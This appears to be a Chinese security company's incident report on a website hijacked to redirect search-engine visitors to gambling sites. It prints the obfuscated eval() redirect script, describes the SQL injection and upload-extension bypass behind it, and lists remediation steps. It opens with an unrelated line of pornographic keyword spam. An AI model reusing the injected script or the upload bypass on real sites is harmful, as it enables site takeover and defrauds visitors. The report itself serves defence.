国产精品久久无码一区-精品国产偷窥一区二区-欧亚欧洲码国产-欧美乱人伦人妻中文字幕-国产av无码国产av毛片

客戶網站于近日被跳轉到賭博網站，打開后直接跳轉到什么北京賽車，pK10等內容的網站上去，客戶網站本身做了百度的推廣，導致所有訪問用戶都跳轉到賭博網站上去，給客戶帶來很大的經濟損失，再一個官方網站的形象也受到了影響。我們SINE安全對客戶網站進行檢查發現，客戶網站的標題TDK被反復篡改成(北京賽車pK10等內容)立刻對該客戶網站的安全，進行全面的源代碼安全審計以及網站漏洞檢測與網站漏洞修復，檢查了客戶的首頁標題TDK內容確實是被篡改，并添加了一些加密的惡意代碼,代碼如下：

type="text/java"eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c]);return p;}('m["9d1lian0"]["8460a"]('h314620 0k2ae70aq05gbfb3146207 341e7o0023p55888c129b3rc1di599f62cg37jh5314620j');',28,28,'x74|x63|x70|x73|x72|x2f|x69|x22|x77|x64|x65|x61|x2e|x6f|x3d|x76|x6a|x3c|x6d|x3e|x79|x75|window|x6e|x68|x3a|x78|x38'.split('|'),0,{}))

上述網站代碼是ASCII編碼，只要轉換成Unicode編碼，就可以看到加密的真實內容。我們工程師對代碼進行解讀，發現該代碼寫的是根據搜索引擎作為判斷條件進行跳轉的代碼,通俗來講就是說，該代碼只針對搜索引擎，網站管理員直接輸入網址并不會發現網站跳轉到賭博內容網站上去，客戶的網站通過百度或搜狗搜索會直接跳轉到這個北京賽車、pk10的網站上去。

針對于上述的問題，我們立即刪除加密的跳轉代碼，先將客戶網站損失降到最低，促使網站正常訪問(因為客戶一直在做百度推廣，一直在燒錢),通過一系列的安全檢測，網站到底是因為那些漏洞被上傳木馬，并篡改網站首頁的呢?經過我們Sine安全工程師對網站代碼的詳細的安全檢測后，發現該網站系統存在SQL注入漏洞，導致攻擊者可以獲取到管理員賬戶和密碼,而網站后臺的地址用的也是默認的admin目錄名,致使黑客獲取密碼后，直接登錄網站后臺，在對網站后臺安全檢測的時候，發現產品圖片上傳功能，存在繞過格式上傳腳本木馬的漏洞。

該網站漏洞產生于網站后臺的產品上傳頁面代碼中的$this->getext($filear["name"]); //取得擴展名$this->set_savename($file); //設置保存文件名，這個代碼對文件擴展名可以直接繞過并上傳php格式的腳本文件,從而讓攻擊者輕易取得網站的權限。客戶還反映說，網站經常被反復的篡改，導致跳轉到賭博網站，找了網站建設的公司，他們也只是刪除掉代碼,沒過多久就又被篡改跳轉了,導致客戶網站損失嚴重，發生篡改跳轉的根本原因就是網站有漏洞，如果沒有修復好網站漏洞，即使刪除掉惡意代碼也只是表面上的工作，不起作用的還是會被反復篡改,于事無補，亡羊補牢一樣。需要對網站進行安全檢測，以及網站漏洞檢測，并修復好網站漏洞，清除木馬后門，網站安全部署好,才會使網站更加的安全穩定運行。

網站漏洞修復的處理過程如下：

對客戶網站源代碼進行安全加固以及防止sql注入的前端過濾代碼,網站的后臺目錄安全設置，更改admin文件名為@#%admin,對網站后臺圖片上傳功能代碼進行漏洞修復，設置上傳文件白名單機制，以及文件上傳的目錄進行了腳本安全權限設置，禁止進行腳本,對上傳的文件擴展也進行了深入的安全過濾,網站的數據庫安全部署，對數據庫的連接信息進行加密，刪除root管理權限，設置普通數據庫賬號，讀寫分離，新建表，查詢表，寫入表等數據庫正常操作權限,網站后臺的賬號密碼設置的復雜一些，密碼為12位數字+字母+大小寫組合，從發現網站漏洞到目前解決問題中，共查找到腳本木馬3個(webshell),一句話小馬后門2個，發現網站的模板內容也被篡改了，導致客戶生成首頁的時候隨之也被加了惡意加密的代碼。

網站安全預防措施：

1.盡量避免網站后臺的默認名稱如admin manage houtai

2.對網站上傳目錄的權限進行控制。(設置無腳本執行權限)

3.網站后臺的用戶名和密碼設置復雜點，數字+字母+大小寫+特殊符號組合。

4.阿里云虛擬主機用戶的FTp賬號密碼要設置復雜點，數字+字母+大小寫+特殊符號組合。

5.如果是單獨服務器的客戶，建議先把服務器的安全部署好，對每個網站的文件夾進行安全部署，數據庫安全部署，,再做網站的安全,否則你網站再安全，服務器不安全也是于事無補。如果對安全不是太懂的話，建議找專業的網站安全公司去處理解決。